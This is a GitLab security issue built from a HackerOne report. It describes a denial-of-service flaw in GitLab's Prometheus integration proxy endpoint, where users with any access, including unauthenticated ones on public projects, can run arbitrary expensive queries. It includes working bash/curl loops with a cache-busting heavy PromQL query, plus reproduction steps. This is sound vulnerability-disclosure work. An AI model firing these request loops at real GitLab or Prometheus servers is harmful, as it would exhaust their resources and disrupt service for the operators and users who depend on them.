DOS and high resource consumption of Prometheus server through abuse of Prometheus integration proxy endpoint
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1723124 by joaxcar
on 2022-10-04, assigned to @truegreg:
Report | Attachments | How To Reproduce
Report
This report is similar to my other report https://hackerone.com/reports/1723106 but the two endpoints grafana/proxy and prometheus/proxy are different and they execute similar but different code paths in the backend. The also have different use cases that might make the fixes differ. Thus I report these two separately, but feel free to connect them in the beginning if that makes it easier.
Summary
I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). But I did force my docker container with 16 cores to work at 100% CPU constant with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab will succeed, while the connection between GitLab and Prometheus will persist). When the attack was executed, I could not restart Prometheus from the terminal with gitlab-ctl stop prometheus
as the service was unresponsive and a gitlab-ctl restart
did not fix it. I had to stop the docker container to have it stop. The impact of the attack depend somewhat on the amount of data on the Prometheus server, but as I only test this on my localhost GitLab Prometheus server it is almost empty compared to real life servers.
Prometheus feature
A user can configure a Prometheus integration and add custom queries that show up in the metrics panel of any environment.
See https://docs.gitlab.com/ee/user/project/integrations/prometheus.html for info on the integration
See https://docs.gitlab.com/ee/operations/metrics/ for environment metrics
A configured environment will get a Prometheus proxy at https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range
Custom metrics are configured by a maintainer of the project, but any user with ANY access to the project can run arbitrary queries towards the query_range endpoint
The setup
I booted up a GitLab Omnibus instance in a docker container, this includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a (spoofed with host file) DNS record of my server.
The Grafana instance already have the Prometheus instance as a datasource, so its possible to use this instance for test purposes. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .
You might need to run the server for a while to have some data in Prometheus. After a fresh boot I used Burp to perform a scan towards my localhost GitLab instance to fill up the server with HTTP requests, I did this two times with a spacing of 24 hours.
The attack
As an unauthenticated user, I can now DOS the Prometheus server (and possibly also affect the overall system state of the docker instance) by running this command in a terminal
for index in {1..20}
do
curl 'https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
To get it working, you might need to modify start_time
and end_time
to something relevant (use date +%s
in a terminal to get current timestamp). If 20 requests are not enough, try to increase the number.
In the docker image run htop
or top
to monitor the CPU
Some details
The anatomy of the requests looks like this pulled apart
https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range <-- The project proxy endpoint
?query= <-- Start of query
<-- An expensive query, just a mess that I made up trying to eat resources -->
min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100
$index <-- Index used as cache buster
h%5D)))&start_time=1654749435&end_time=1654771035&step=15
Important to note is that the query is arbitrary, I just tried to construct one that was heavy enough to tilt the server. This could probably be made way heavier. Also note the use of index
in the query, this is a "cache buster" that is needed as GitLab backend will not run multiple commands towards Prometheus if the query is identical.
Result
Here is a video showing running the query towards my local server
Steps to reproduce
(if you have any other Prometheus instance you can test use that one. I will describe the attack with docker GitLab omnibus)
- Boot up a docker image of the latest gitlab omnibus (see https://docs.gitlab.com/ee/install/docker.html)
- Log in as admin and go to http://gitlab.example.com/admin/application_settings/network and expand
outbound requests
- Enable requests from webhook and services to localhost (this is to be able to use the built in Prometheus instance)
- Create a new project on the GitLab instance
- Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/integrations/prometheus/edit and enable the integration. Use the server http://localhost:9090
- Go to http://gitlab.example.com/-/environments and create an environment
- Now make sure to load the Prometheus instance with some data. Make a bunch of requests to the GitLab instance over a period of time
- Take a terminal and get a shell on the docker image. Ex
docker exec -it gitlab /bin/bash
- run
top
to monitor CPU level - Now open another terminal and run
date +%s
- Take the current date and update this script starttime and endtime
for index in {1..100}
do
curl 'https://gitlab.example.com/group1/project1/-/environments/1/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
- Run it and watch the CPU in
top
. If there is enough data in the instance all processors should spike to 100%
Impact
DOS and high resource consumption on Prometheus server
What is the current bug behavior?
There is no special permissions to run arbitrary queries Prometheus server, even if only maintainers are allowed to configure "custom queries"
There are two issues, first of any user with any access to the project can execute arbitrary queries (unauthenticated users on public projects). Second, as the queries are arbitrary they can be how complex as the attacker wants and thus break the Prometheus server.
What is the expected correct behavior?
Queries should be restricted to the configured ones.
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown
GitLab information
Version: 15.4.0-ee
Revision: abbda55531f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: http://gitlab2.joaxcar.com
HTTP Clone URL: http://gitlab2.joaxcar.com/some-group/some-project.git
SSH Clone URL: git@gitlab2.joaxcar.com:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
DOS and high resource consumption on Prometheus server
Impact
DOS and high resource consumption on Prometheus server
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: